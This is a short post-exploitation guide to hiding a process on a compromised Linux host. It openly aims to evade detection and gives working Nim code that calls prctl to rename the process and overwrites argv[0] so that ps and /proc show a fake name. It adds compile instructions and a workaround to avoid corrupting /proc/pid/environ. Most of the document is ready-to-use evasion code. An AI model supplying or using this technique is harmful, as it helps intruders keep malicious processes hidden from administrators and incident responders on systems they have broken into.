Process hiding in Linux

Why?

You want to evade detection post compromise of a host, and hide your process as something innocuous when someone inspects /proc or ps.

When?

You're host is Linux, and your executable is in C, or a language with FFI support.

How?

There are two classes of data to spoof:

1. The contents of /proc/pid/cmdline. This is what shows up with ps -f.
2. The contents of /proc/pid/comm and the first line of /proc/pid/status. This is what shows up with ps without -f.

In nim

import os

proc NimMain() {.cdecl, importc.}

proc syscall(number: clong): clong
    {.importc, varargs, header: "sys/syscall.h".}
var NR_PRCTL
    {.importc: "__NR_prctl", header: "unistd.h".}: int
var PR_SET_NAME
    {.importc: "PR_SET_NAME", header: "sys/prctl.h".}: int

proc main(argc: int, argv: cstringArray, envp: cstringArray): int
        {.cdecl, exportc.} =
    NimMain()

    const FAKE_COMMAND = "spoofed"

    # handles /proc/pid/comm and /proc/pid/status
    discard syscall(NR_PRCTL, PR_SET_NAME, cstring(FAKE_COMMAND))

    # handles /proc/pid/cmdline
    let totalLength = len(argv[0])
    var i = 0
    for ch in FAKE_COMMAND:
        argv[0][i] = FAKE_COMMAND[i]
        i += 1
    argv[0][i] = '\x00'
    for j in i .. totalLength:
        argv[0][j] = '\x00'

    sleep(60000)

• Note that you'll need to compile this with --nomain.
• Note that as argc and envp is consecutive in memory this means that a longer FAKE_COMMAND than the actual argv[0] means we overwrite the contents of /proc/pid/environ. To work around this, ensure your executable has a longer name than the what you want to spoof as.